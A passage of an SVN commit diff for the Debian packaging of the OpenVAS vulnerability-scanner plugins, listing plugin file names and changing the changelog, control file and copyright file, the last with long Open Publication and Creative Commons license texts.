+postgresql_toascii_overflow.nasl +postgresql_unpassworded.nasl +postnuke_info_disclosure.nasl +powerplay.nasl +powerportal_path_disclosure.nasl +powerup_information_disclosure.nasl +pptp_detect.nasl +printenv.nasl +processit.nasl +proftpd_1_2_0_rc2.nasl +proftpd_debian.nasl +proftpd_exhaust.nasl +proftpd_mkdir_overflow.nasl +proftpd_overflow.nasl +proftpd_pre10.nasl +proftpd_pre6_exploit.nasl +proxy_connect.nasl +proxy_gopher.nasl +proxy_port.nasl +proxy_post.nasl +proxy_use.nasl +psychoblogger_sql_injection.nasl +ptnews_admin.nasl +qmtp_detect.nasl +qpopper_euidl.nasl +qpopper_list.nasl +qpopper.nasl +qpopper_qvsnprinf_overflow.nasl +quickstore2.nasl +quickstore.nasl +quicktime_admin.nasl +quicktime_player_overflow.nasl +quixplorer_file_disclosure.nasl +quote.nasl +radmin_detect.nasl +ramcrash.nasl +raptor_isn.nasl +RA_www_css.nasl +RA_www_detect.nasl +rbs.nasl +readdesigncheck.nasl +realplayer_png_heap_corruption.nasl +realserver_disclosure.nasl +realserverg2.nasl +realserver_ussr_dos.nasl +record_route.nasl +remwatch.nasl +resin_server_status.nasl +resin_traversal.nasl +reviewpost_sql.nasl +rexecd.nasl +rfparalyze.nasl +rfpoison.nasl +rh_inetd.nasl +rich_media_ecommerce_stores_sensitive_information_insecurely.nasl +rip_detect.nasl +rip_poison.nasl +ris_detect.nasl +risearch_arbitrary_file_access.nasl +rlogin_froot.nasl +rlogin.nasl +roads_cgi.nasl +rockliffe_mailsite_overflow.nasl +rot13sj.nasl +rover_pop3_overflow.nasl +roxen_counter.nasl +roxen_percent.nasl +rpc_3270.nasl +rpc_alis.nasl +rpc_amd.nasl +rpc_automountd.nasl +rpc_cmsd.nasl +rpc_cmsd_overflow.nasl +rpc_database.nasl +rpc_dmispd.nasl +rpc_etherstatd.nasl +rpc_fam.nasl +rpcinfo.nasl +rpc_kcms.nasl +rpc_keyserv.nasl +rpc_llockmgr.nasl +rpc_nfsd.nasl +rpc_nlockmgr.nasl +rpc_nsed.nasl +rpc_nsemntd.nasl +rpc_portmap.nasl +rpc_rexd.nasl +rpc_rje_mapper.nasl +rpc_rquotad.nasl +rpc_rstatd.nasl +rpc_rusers.nasl +rpc_sadmin.nasl +rpc_sched.nasl +rpc_selection.nasl +rpc_showfhd.nasl +rpc_snmp.nasl +rpc_sprayd.nasl +rpc_statd.nasl +rpc_statmon.nasl +rpc_sunlink_mapper.nasl +rpc_tfsd.nasl +rpc_tooltalk_format_string.nasl +rpc_tooltalk.nasl +rpc_walld.nasl +rpc_X25.nasl +rpc_xdrmem_bytes.nasl +rpc_ypbind.nasl +rpc_yppasswd.nasl +rpc_ypupated.nasl +rpc_ypxfrd.nasl +rpm_query.nasl +rsh.nasl +rsh_null.nasl +rsh_users.nasl +rsync_array_overflow.nasl +rsync_modules.nasl +rtsp_detect.nasl +rusers_output.nasl +rwalld_format_string.nasl +rwhois_format_string2.nasl +rwhois_format_string.nasl +samba_arbitrary_file_creation.nasl +samba_frags_overflow.nasl +samba_possible_overflow.nasl +sambar_cgi.nasl +sambar_cgi_path_disclosure.nasl +sambar_default_accounts.nasl +sambar_DoS.nasl +sambar_info_disclosure.nasl +sambar_mailit.nasl +sambar_plaintext.nasl +sambar_search_cgi.nasl +sambar_sendmail.nasl +sambar_sysadmin.nasl +sambar_xss.nasl +samba_tng_flaws.nasl +samba_trans2open_overflow.nasl +samba_unicode_overflow.nasl +samihttp_1_0_4.nasl +sapdb_detect.nasl +savant_cgi_download.nasl +savant_cgitest.nasl +savant_percent_dos.nasl +sawmill.nasl +sawmill_password.nasl +scozbook.nasl +scriptlogic_hidden_share.nasl +sdbsearch.nasl +sedum_dos.nasl +sendmail_bt_switch.nasl +sendmail_conversion_overflow.nasl +sendmail_decode.nasl +sendmail_dns_map_txt_overflow.nasl +sendmail_expn.nasl +sendmail_ident.nasl +sendmail_local_overflow.nasl +sendmail_mime_overflow2.nasl +sendmail_mime_overflow.nasl +sendmail_redirection.nasl +sendmail_sun_forward.nasl +sendtemp.nasl +servletExec_File_Reading.nasl +servletExec_Path_Disclosure.nasl +sfm_xss.nasl +sgdynamo_path.nasl +sgdynamo_xss.nasl +sgi_rpc_passwd.nasl +sglmerchant_information_disclosure.nasl +shaft.nasl +shareaza_network.nasl +sheerdns_traversal.nasl +shells.nasl +shlwapi_dll_dos.nasl +SHN_discard.nasl +SHN_MySQL_Privilege_Escalation.nasl +shopping_cart_information_disclosure.nasl +shopplus_information_disclosure.nasl +shoutcast_admin_cgi_overflow.nasl +shoutcast_version.nasl +ShowCode.nasl +showmount.nasl +silverstream_database.nasl +silverstream_dirlisting.nasl +SimpleBBS_users_disclosure.nasl +simple_chat_user_disclosure.nasl +simple_form_mail_relaying.nasl +simple_form_mail_relaying_via_subject_tags.nasl +singapore_file_disclosure.nasl +sip_detection.nasl +sip_status_server.nasl +siteframe_xss.nasl +sitescope_management_server.nasl +sitescope_web_admin_server.nasl +siteUserMod.nasl +six_webboard.nasl +slmail27.nasl +slmail_helo.nasl +slmail.nasl +slmail_smtp_overflows.nasl +slmail_webmail_flaws.nasl +small_ftp_traversal.nasl +smartserver_pop_overflow.nasl +smb2www_cmd_exec.nasl +smb2www_installed.nasl +smb_accessible_shares.nasl +smb_bruteforce_pass.nasl +smb_crash_winlogon.nasl +smb_dom2sid.nasl +smb_enum_services.nasl +smb_enum_shares.nasl +smb_group_account_op.nasl +smb_group_admin.nasl +smb_group_backup_op.nasl +smb_group_domain_admin.nasl +smb_group_print_op.nasl +smb_group_replicator.nasl +smb_groups_guest.nasl +smb_group_system_op.nasl +smb_host2sid.nasl +smb_lanman_browse_list.nasl +smb_localusers_autodisabled.nasl +smb_localusers_changepw.nasl +smb_localusers_disabled.nasl +smb_localusers_lastpwchange.nasl +smb_localusers_neverloggedon.nasl +smb_localusers_pwexpiry.nasl +smb_login_as_e.nasl +smb_login_as_users.nasl +smb_login_as_x.nasl +smb_login_deloder.nasl +smb_login.nasl +smb_mssql7.nasl +smb_nativelanman.nasl +smb_netusergetaliases.nasl +smb_netusergetgroups.nasl +smb_netusergetinfo_local.nasl +smb_netusergetinfo.nasl +smb_nt.inc +smb_nt_kb870669.nasl +smb_nt_ms00-029.nasl +smb_nt_ms00-035.nasl +smb_nt_ms00-036.nasl +smb_nt_ms00-047.nasl +smb_nt_ms00-052.nasl +smb_nt_ms00-053.nasl +smb_nt_ms00-062.nasl +smb_nt_ms00-065.nasl +smb_nt_ms00-066.nasl +smb_nt_ms00-067.nasl +smb_nt_ms00-070.nasl +smb_nt_ms00-086.nasl +smb_nt_ms00-089.nasl +smb_nt_ms00-091.nasl +smb_nt_ms01-003.nasl +smb_nt_ms01-008.nasl +smb_nt_ms01-009.nasl +smb_nt_ms01-011.nasl +smb_nt_ms01-025.nasl +smb_nt_ms01-046.nasl +smb_nt_ms01-048.nasl +smb_nt_ms02-001.nasl +smb_nt_ms02-003.nasl +smb_nt_ms02-005.nasl +smb_nt_ms02-006.nasl +smb_nt_ms02-008.nasl +smb_nt_ms02-009.nasl +smb_nt_ms02-013.nasl +smb_nt_ms02-014.nasl +smb_nt_ms02-016.nasl +smb_nt_ms02-017.nasl +smb_nt_ms02-018.nasl +smb_nt_ms02-021.nasl +smb_nt_ms02-024.nasl +smb_nt_ms02-025.nasl +smb_nt_ms02-026.nasl +smb_nt_ms02-029.nasl +smb_nt_ms02-030.nasl +smb_nt_ms02-031.nasl +smb_nt_ms02-032.nasl +smb_nt_ms02-035.nasl +smb_nt_ms02-042.nasl +smb_nt_ms02-045.nasl +smb_nt_ms02-048.nasl +smb_nt_ms02-050.nasl +smb_nt_ms02-051.nasl +smb_nt_ms02-052.nasl +smb_nt_ms02-054.nasl +smb_nt_ms02-055.nasl +smb_nt_ms02-060.nasl +smb_nt_ms02-063.nasl +smb_nt_ms02-070.nasl +smb_nt_ms02-071.nasl +smb_nt_ms02-072.nasl +smb_nt_ms03-001.nasl +smb_nt_ms03-005.nasl +smb_nt_ms03-007.nasl +smb_nt_ms03-008.nasl +smb_nt_ms03-009.nasl +smb_nt_ms03-010.nasl +smb_nt_ms03-011.nasl +smb_nt_ms03-012.nasl +smb_nt_ms03-013.nasl +smb_nt_ms03-017.nasl +smb_nt_ms03-021.nasl +smb_nt_ms03-023.nasl +smb_nt_ms03-024.nasl +smb_nt_ms03-041.nasl +smb_nt_ms03-042.nasl +smb_nt_ms03-043.nasl +smb_nt_ms03-045.nasl +smb_nt_ms04-001.nasl +smb_nt_ms04-016.nasl +smb_nt_ms04-029.nasl +smb_null_params_dos.nasl +smb_reg_autologon.nasl +smb_reg_cachedlogons.nasl +smb_reg_dontshowlastusername.nasl +smb_reg_hklm.nasl +smb_registry_access.nasl +smb_registry_full_access.nasl +smb_reg_logonscreen.nasl +smb_reg_missing_winreg.nasl +smb_reg_nodialin.nasl +smb_reg_pdc.nasl +smb_reg_ras_access.nasl +smb_reg_run_permissions.nasl +smb_reg_schedule.nasl +smb_reg_service_pack.nasl +smb_reg_service_pack_W2K.nasl +smb_reg_sfcdisable.nasl +smb_reg_trojan_paths.nasl +smb_reg_winlogon_permissions.nasl +smb_reg_winvnc_perms.nasl +smb_scope.nasl +smb_sid2localuser.nasl +smb_sid2user.nasl +smb_svc_alerter.nasl +smb_svc_messenger.nasl +smb_svc_scriptlogic.nasl +smb_users_autodisabled.nasl +smb_users_changepw.nasl +smb_users_disabled.nasl +smb_users_lastpwchange.nasl +smb_users_neverloggedon.nasl +smb_users_pwexpiry.nasl +smb_virii.nasl +smb_xp_ms01-059.nasl +smc2804wbr_default_password.nasl +smtp_bounce.nasl +smtp_bypass_cisco.nasl +smtp_file.nasl +smtp_helo.nasl +smtp_ms01-037.nasl +smtp_program.nasl +smtp_relay2.nasl +smtp_relay.nasl +smtp_settings.nasl +snapstream_dir_trav.nasl +sniff_css.nasl +sniff_file_disclosure.nasl +snitz_down_http_xss.nasl +snitz_forums_2000_sql_injection.nasl +snitz_forums_2000_xss.nasl +snmp_cisco_type.nasl +snmp_dlink_user_pass_disclosure.nasl +snmp_dos.nasl +snmp_ifaces.nasl +snmp_lanman_services.nasl +snmp_lanman_shares.nasl +snmp_lanman_users.nasl +snmp_oversized_length_field_dos.nasl +snmp_oversized_length_field_two.nasl +snmp_processes.nasl +snmp_sysDesc.nasl +snmp_vacm.nasl +snmpwalk_portscan.nasl +snmpXdmid.nasl +socks4a_hostname_overflow.nasl +socks4_username_overflow.nasl +socks.nasl +sojourn.nasl +solaris_lpd_env_cmd_exec.nasl +source_routed.nasl +spinclient.nasl +sql_injection.nasl +sqlqhit_information_disclosure.nasl +squid_overflows.nasl +squirrelmail_detect.nasl +squirremail_cross_site_scripting.nasl +sscd_input.nasl +ssh1_proto_enabled.nasl +ssh3_passwd.nasl +ssh_AllowedAuthentications.nasl +ssh_bruteforce.nasl +ssh_crc32.nasl +ssh_detect.nasl +ssh_dropbear.nasl +ssh_forwarding.nasl +ssh_func.inc +ssh_insertion.nasl +ssh_kerberos.nasl +ssh_keygen.nasl +ssh_multivulns_16122002.nasl +ssh_overflow.nasl +ssh_proto_version.nasl +ssh_scp.nasl +ssh_setsid.nasl +stacheldraht.nasl +statd_format_string.nasl +stockman_shopping_cart_cmd_exec.nasl +stockman_shopping_cart_path_disclosure.nasl +store_cgi.nasl +story.nasl +stream.nasl +stronghold.nasl +stronghold_swish.nasl +stun_detection.nasl +subseven.nasl +sun_cobalt_adaptive_firewall_detect.nasl +sunkill.nasl +superguestbook_config_disclosure.nasl +surgeldap_file_disclosure.nasl +suse_cgi_bin_sdb.nasl +suse_identd.nasl +swat_detect.nasl +swat_guessable_usernames.nasl +swc_overflow.nasl +sygate_remote_control.nasl +synchrologic_detect.nasl +systat.nasl +tanned_format_string.nasl +tcp_chorusing.nasl +tcp_seq.nasl +teardrop.nasl +technote.nasl +telnet_func.inc +telnet.nasl +telnetserver_detect_type_nd_version.nasl +TelSrv_DoS.nasl +teso_telnet.nasl +test-cgi.nasl +texis_info_disclosure.nasl +texis_path_disclosure.nasl +textcounter_pl.nasl +tfn.nasl +tfs_smtp_overflow.nasl +theserver_cleartext.nasl +thttpd_buffer_overflow.nasl +thttpd_bug.nasl +thttpd_ssi.nasl +thttpd_virtualhost_escape.nasl +tiny_proxy_heap_overflow.nasl +tivoli_relay_overflow.nasl +tmosdos.nasl +tomcat_admin.nasl +tomcat_directory_listing_and_file_disclosure.nasl +tomcat_path_disclosure.nasl +tomcat_server_default_files.nasl +tomcat_snoop.nasl +tomcat_source_exposure.nasl +tomcat_srcjsp_malformed_request.nasl +tomcat_status.nasl +torturecgis.nasl +traceroute.nasl +translate_f.nasl +trendmicro_emanager.nasl +trinity.nasl +trinoo.nasl +trojan_horses.nasl +truegalerie_admin_bypass.nasl +ttawebtop.nasl +ttcms_code_injection.nasl +ttyprompt.nasl +typo3_dev_read.nasl +ultraseek_dos.nasl +unicast_dos.nasl +unknown_services.nasl +unreal_game_engine.nasl +upb_info_leak.nasl +upload_cgi.nasl +uploader_exe.nasl +upload_lite_cgi.nasl +uploadskrip.nasl +usermin_session_id.nasl +ustorekeeper.nasl +uw_imap_overflow.nasl +uw_imap_overflow_two.nasl +vbulletin_calender_command_execution.nasl +vchat_logs.nasl +vftpd_overflow.nasl +viewcvs_xss.nasl +viewpage_file_reading.nasl +view_source_cgi.nasl +vignette_info_leak.nasl +viralator.nasl +visadmin.nasl +vnc_http.nasl +vpasswd_cgi.nasl +vpop_input_validation.nasl +vpopmail_cmd_exec.nasl +vssetcookie.nasl +vw_bof.nasl +W32.Sasser.Worm.nasl +w32_spybot_worm_variant.nasl +w3msql_overflow.nasl +wayboard.nasl +webactive_log.nasl +webadmin.nasl +webalizer.nasl +webcart_cmd_exec.nasl +webcart.nasl +webc_cgi_installed.nasl +webc_cgi_overflows.nasl +webchat_code_injection.nasl +web_chat_xss.nasl +webdav_enabled.nasl +webdav_iis.nasl +webdav.nasl +webdist.nasl +webdriver.nasl +webfind.nasl +webgais.nasl +weblogic_hostname_disclosure.nasl +weblogic_percent.nasl +webmin.nasl +webmin_session_id.nasl +webmirror.nasl +webnews.nasl +webplus_install_path.nasl +webplus.nasl +webplus_version.nasl +websendmail.nasl +webserver_robot.nasl +webshield.nasl +WebSite.nasl +website_pro.nasl +websitepro_overflow.nasl +webspeed.nasl +websphere_cache_DoS.nasl +websphere_xss.nasl +webspirs_cgi.nasl +web_traversal.nasl +webweaver_retr_dos.nasl +webwho_pl.nasl +webwiz_forum_password_disclosure.nasl +webwiznews_password_disclosure.nasl +wftp_241_dos.nasl +wftp_dos.nasl +wftp.nasl +whois_raw.nasl +wihphoto_file_read.nasl +winamp_buffer_overflow.nasl +windmail.nasl +windows_asn1_vuln_ntlm.nasl +windows_terminal_services.nasl +wingate_denial.nasl +wingate.nasl +wingate_user.nasl +winmessenger_installed.nasl +winmx_installed.nasl +winnt_dns_flood.nasl +winnt_pptp_dos.nasl +winnuke.nasl +wins_udp_flood.nasl +win_trinoo.nasl +wireless_sensor_detection.nasl +wnn_overflow.nasl +wordit_logbook.nasl +worldclient_server_detection.nasl +worm_netsky_b.nasl +wowBB_flaws.nasl +wrap.nasl +ws4d_overflow.nasl +wu_ftpd_glob.nasl +wu_ftpd_overflow.nasl +wu_ftpd_pasv_format_string.nasl +wu_ftpd_site_newer.nasl +wwwboardpwd.nasl +www_default_page.nasl +www_fingerprinting_hmap.nasl +www_too_long_auth.nasl +www_too_long_post.nasl +www_too_long_url.nasl +wwwwais.nasl +xedus_detect.nasl +xedus_xss.nasl +xfs_overflow.nasl +xitami_overflow.nasl +xmail_overflow.nasl +xmb_sql_injection.nasl +xmb_xss.nasl +X.nasl +xnews.nasl +xolox_installed.nasl +xoops_myheader_url_xss.nasl +xoops_path_disclosure.nasl +xoops_viewtopic_xss.nasl +xoops_xss.nasl +xst_http_trace.nasl +xtel_detect.nasl +xtelw_detect.nasl +xtramail_control.nasl +xtramail_helo.nasl +xtramail_pop_overflow.nasl +xtux_server.nasl +yabb.nasl +yabbse_cmd_exec.nasl +yahoo_installed.nasl +yppasswdd.nasl +zeus.nasl +zml_cgi_traversal.nasl +zope_dos.nasl +zope_img_updating.nasl +zope.nasl Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/changelog 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,5 +1,32 @@ -openvas-plugins (1.0.7-1) unstable; urgency=low +openvas-plugins (1.0.2-1) unstable; urgency=low - * initial release + * New upstream release. + * Make the debian/rules file use the audit architecture written for the + nessus-plugins package and available in upstream's audit dir. + * Make fixes to upstreams' audit infrastructure (committed to SVN should be + removed in the next release) - -- Jan Wagner Fri, 18 Sep 2009 13:05:59 +0200 + -- Javier Fernandez-Sanguino Pen~a Fri, 22 Aug 2008 03:10:27 +0200 + +openvas-plugins (1.0.1-1) UNRELEASED; urgency=low + + * New upstream release + * change build dependency from openvas-server to openvas-server-dev + * add libopenvasnasl1-dev, libgnutls-dev and dpatch to build dependencies + * include dpatch infrastructure + * prevent removing of libtool when running make distclean via + 01_makefile_fix_distclean.dpatch + * adjust examples via 02_adjust_examples.dpatch and remove homebrew patching + * bump versioned dependency of debhelper to ">=5.0.0", since compat is "5" + * bump standards-version to 3.7.2 since we should comply at least + * remove debian/substvars + + -- Jan Wagner Mon, 16 Jun 2008 23:13:17 +0200 + +openvas-plugins (0.9.1-1) UNRELEASED; urgency=low + + * First release + + -- Javier Fernandez-Sanguino Pen~a Wed, 31 Oct 2007 21:55:35 +0100 + + Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/control 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,27 +1,18 @@ Source: openvas-plugins Section: admin Priority: optional -Maintainer: Debian OpenVAS Maintainers -Uploaders: Tim Brown , Javier Fernandez-Sanguino Pen~a , Jan Wagner , Joey Schulze -Build-Depends: debhelper (>= 5), dpatch, libopenvas2-dev, openvas-server-dev (>= 1.0), libopenvasnasl2-dev, libgmp3-dev, libz-dev, libpcap-dev, libnet1-dev, libgnutls-dev, libglib2.0-dev -Homepage: http://www.openvas.org/ -Vcs-Browser: https://wald.intevation.org/plugins/scmsvn/viewcvs.php/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/?root=openvas -Vcs-Svn: https://svn.wald.intevation.org/svn/openvas/trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/ -Standards-Version: 3.8.3 +Maintainer: Javier Fernandez-Sanguino Pen~a +Build-Depends: debhelper (>= 5.0.0), dpatch, libopenvas1-dev (>= 1.0), openvas-server-dev (>= 1.0), libopenvasnasl1-dev, libgmp3-dev, libz-dev, libpcap0.8-dev | libpcap-dev, nmap, libnet1-dev, libgnutls-dev +Standards-Version: 3.7.2 +Homepage: http://www.openvas.org Package: openvas-plugins -Section: net Architecture: any -Depends: ${shlibs:Depends}, ${misc:Depends} -Recommends: openvas-server (>= 1.0), rsync, nmap, smbclient -Suggests: openvas-client, snmp, pnscan, strobe, ike-scan -Description: remote network security auditor - plugins - The Open Vulnerability Assessment System is a modular security auditing - tool, used for testing remote systems for vulnerabilities that should be - fixed. +Depends: ${shlibs:Depends}, debconf | debconf-2.0 +Recommends: wget, openvas-server (>= 1.0), nmap, snmp +Description: OpenVAS vulnerability tests + OpenVAS is a network security scanner. It makes possible to test the security + of remote hosts in an attempt to find vulnerable spots that should be fixed. . - It is made up of two parts: a server, and a client. The server/daemon, - openvasd, is in charge of the attacks, whereas the client, - OpenVAS-Client, provides an X11/GTK+ user interface. - . - This package provides the infrastructure for using the plugin feed. + This package contains the OpenVAS plugins, a set of security tests as well + as scripts to build additional plugins. Modified: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/copyright 2009-10-06 22:38:55 UTC (rev 5408) @@ -1,83 +1,480 @@ This package is based on the nessus-plugins package, which was debianized by Josip Rodin on 2 Oct 1999. -It was downloaded from http://www.openvas.org/ +Original sources for this software can be found at: http://www.openvas.org/ -Upstream Author: OpenVAS +This package is Copyright (C) 1998 - 2007 Renaud Deraison and others. +[ For specific (c) statements see the individual files. ] +[ NOTE: The LICENSE.txt file distributed in the source package describes + Tenable's License which does not apply to the GPL Nessus plugins ] -Copyright holders: - * Renaud Deraison - * Per Bothner - * Gordon Matzigkeit - * Lukas Grunwald - * Jan-Oliver Wagner - * Michel Arboi - * Michel Arboi +The binary code of this package is distributed under the +GNU General Public License v2. -License: +This package also provides the update-nessus-plugins and +describe-nessus-plugin scripts (provided in the examples directory). +These are copyright (c) 2003, George A. Theall +and they were downloaded from +http://www.tifaware.com/perl/update-nessus-plugins/ +and +http://www.tifaware.com/perl/describe-nessus-plugin/ - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. +These scripts are free software; you can redistribute it and/or modify it +under the same terms as Perl itself. - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. +-------------------------------------------------------------------------- + Plugins +-------------------------------------------------------------------------- - You should have received a copy of the GNU General Public License - along with this program; if not, write to the Free Software - Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA +All of the C and NASL scripts included in this release (unless noted +otherwise in the plugin itself, see below) are distributed +under the "Nessus Script License" which is equivalent to the +GNU General Public License version 2: -On Debian systems, the complete text of the GNU General Public License -can be found in /usr/share/common-licenses/GPL-2 file. + This program is free software; you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation; either version 2 of the License, or + (at your option) any later version. + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. -other Licenses: - Files: config.* - Copyright (C) 1992-2006 Free Software Foundation, Inc - License: GPL-2+ + You should have received a copy of the GNU General Public License + along with this program; if not, write to the Free Software + Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +On Debian systems, full text of the GNU GPL can always be +found in the /usr/share/common-licenses/GPL file. - File: configure - Copyright (C) 1992-2006 Free Software Foundation, Inc - License: - This configure script is free software; the Free Software Foundation - gives unlimited permission to copy, distribute and modify it. +The NASL plugins might include text provided from vendor advisories +that are distributed under different license contents. Most notably: - File: configure.in - Copyright (C) 1998 - 2006 Tenable Network Security, Inc. - License: GPL-2 - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License version 2, - as published by the Free Software Foundation +Debian advisories +----------------- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. +Debian advisories are (c) 1997-2005 Software in the Public Interest, Inc. +for more information see http://www.debian.org/licens - File: ltmain.sh - Copyright (C) 1996-2005 Free Software Foundation, Inc. - License: GPL-2+ +This material may be distributed only subject to the terms and conditions +set forth in the Open Publication License, Draft v1.0 or later +(the latest version is presently available at +http://www.opencontent.org/openpub/) - File: openvas-nvt-sync.in - Copyright DN-Systems Enterprise Internet Solutions GmbH 2007 - License: GPL-2 +Full license: - File: plugins/3com_hub/3com_hub.c - Copyright (C) Renaud Deraison - License: GPL-2 + Open Publication License - File: plugins/find_service/find_service.c - License: GPL + v1.0, 8 June 1999 - File: plugins/openvas_tcp_scanner/openvas_tcp_scanner.c - Copyright (C) 2004 Michel Arboi - License: GPL-2 +I. REQUIREMENTS ON BOTH UNMODIFIED AND MODIFIED VERSIONS -The Debian packaging is licensed under the GPL-3, and - (c) 2009 Jan Wagner + The Open Publication works may be reproduced and distributed in whole + or in part, in any medium physical or electronic, provided that the + terms of this license are adhered to, and that this license or an + incorporation of it by reference (with any options elected by the + author(s) and/or publisher) is displayed in the reproduction. -On Debian systems, the complete text of the GNU General -Public License version 3 can be found in `/usr/share/common-licenses/GPL-3'. + Proper form for an incorporation by reference is as follows: Copyright + (c) by . This material may be + distributed only subject to the terms and conditions set forth in the + Open Publication License, vX.Y or later (the latest version is + presently available at http://www.opencontent.org/openpub/). The + reference must be immediately followed with any options elected by the + author(s) and/or publisher of the document (see section VI). + + Commercial redistribution of Open Publication-licensed material is + permitted. + + Any publication in standard (paper) book form shall require the + citation of the original publisher and author. The publisher and + author's names shall appear on all outer surfaces of the book. On all + outer surfaces of the book the original publisher's name shall be as + large as the title of the work and cited as possessive with respect to + the title. + +II. COPYRIGHT + + The copyright to each Open Publication is owned by its author(s) or + designee. + +III. SCOPE OF LICENSE + + The following license terms apply to all Open Publication works, + unless otherwise explicitly stated in the document. + + Mere aggregation of Open Publication works or a portion of an Open + Publication work with other works or programs on the same media shall + not cause this license to apply to those other works. The aggregate + work shall contain a notice specifying the inclusion of the Open + Publication material and appropriate copyright notice. + + SEVERABILITY. If any part of this license is found to be unenforceable + in any jurisdiction, the remaining portions of the license remain in + force. + + NO WARRANTY. Open Publication works are licensed and provided "as is" + without warranty of any kind, express or implied, including, but not + limited to, the implied warranties of merchantability and fitness for + a particular purpose or a warranty of non-infringement. + +IV. REQUIREMENTS ON MODIFIED WORKS + + All modified versions of documents covered by this license, including + translations, anthologies, compilations and partial documents, must + meet the following requirements: + * The modified version must be labeled as such. + * The person making the modifications must be identified and the + modifications dated. + * Acknowledgement of the original author and publisher if applicable + must be retained according to normal academic citation practices. + * The location of the original unmodified document must be + identified. + * The original author's (or authors') name(s) may not be used to + assert or imply endorsement of the resulting document without the + original author's (or authors') permission. + +V. GOOD-PRACTICE RECOMMENDATIONS + + In addition to the requirements of this license, it is requested from + and strongly recommended of redistributors that: + * If you are distributing Open Publication works on hardcopy or + CD-ROM, you provide email notification to the authors of your + intent to redistribute at least thirty days before your manuscript + or media freeze, to give the authors time to provide updated + documents. This notification should describe modifications, if + any, made to the document. + * All substantive modifications (including deletions) be either + clearly marked up in the document or else described in an + attachment to the document. + * Finally, while it is not mandatory under this license, it is + considered good form to offer a free copy of any hardcopy and + CD-ROM expression of an Open Publication-licensed work to its + author(s). + +VI. LICENSE OPTIONS + + The author(s) and/or publisher of an Open Publication-licensed + document may elect certain options by appending language to the + reference to or copy of the license. These options are considered part + of the license instance and must be included with the license (or its + incorporation by reference) in derived works. + + A. To prohibit distribution of substantively modified versions without + the explicit permission of the author(s). "Substantive modification" + is defined as a change to the semantic content of the document, and + excludes mere changes in format or typographical corrections. + + To accomplish this, add the phrase `Distribution of substantively + modified versions of this document is prohibited without the explicit + permission of the copyright holder.' to the license reference or copy. + + B. To prohibit any publication of this work or derivative works in + whole or in part in standard (paper) book form for commercial purposes + is prohibited unless prior permission is obtained from the copyright + holder. + + To accomplish this, add the phrase 'Distribution of the work or + derivative of the work in any standard (paper) book form is prohibited + unless prior permission is obtained from the copyright holder.' to the + license reference or copy. + +Gentoo advisories +----------------- + +Gentoo Advisories are (c) 2001-2005 Gentoo Foundation, Inc. + +The messages of Gentoo advisories are release under the +Creative Commons - Attribution / Share Alike license. + + You are free: + * to copy, distribute, display, and perform the work + * to make derivative works + * to make commercial use of the work + + Under the following conditions: + + by + Attribution. You must give the original author credit. + Share Alike. If you alter, transform, or build upon this work, you may + distribute the resulting work only under a license identical to this + one. + * For any reuse or distribution, you must make clear to others the + license terms of this work. + * Any of these conditions can be waived if you get permission from + the copyright holder. + Your fair use and other rights are in no way affected by the above. + +For more information see http://creativecommons.org/licenses/by-sa/2.0/ + +Full license: + + Creative Commons + + Creative Commons Legal Code + + Attribution-ShareAlike 2.0 + CREATIVE COMMONS CORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE + LEGAL SERVICES. DISTRIBUTION OF THIS LICENSE DOES NOT CREATE AN + ATTORNEY-CLIENT RELATIONSHIP. CREATIVE COMMONS PROVIDES THIS + INFORMATION ON AN "AS-IS" BASIS. CREATIVE COMMONS MAKES NO WARRANTIES + REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY FOR + DAMAGES RESULTING FROM ITS USE. + + License + + THE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS + CREATIVE COMMONS PUBLIC LICENSE ("CCPL" OR "LICENSE"). THE WORK IS + PROTECTED BY COPYRIGHT AND/OR OTHER APPLICABLE LAW. ANY USE OF THE + WORK OTHER THAN AS AUTHORIZED UNDER THIS LICENSE OR COPYRIGHT LAW IS + PROHIBITED. + + BY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND + AGREE TO BE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS + YOU THE RIGHTS CONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF + SUCH TERMS AND CONDITIONS. + + 1. Definitions + a. "Collective Work" means a work, such as a periodical issue, + anthology or encyclopedia, in which the Work in its entirety in + unmodified form, along with a number of other contributions, + constituting separate and independent works in themselves, are + assembled into a collective whole. A work that constitutes a + Collective Work will not be considered a Derivative Work (as + defined below) for the purposes of this License. + b. "Derivative Work" means a work based upon the Work or upon the + Work and other pre-existing works, such as a translation, musical + arrangement, 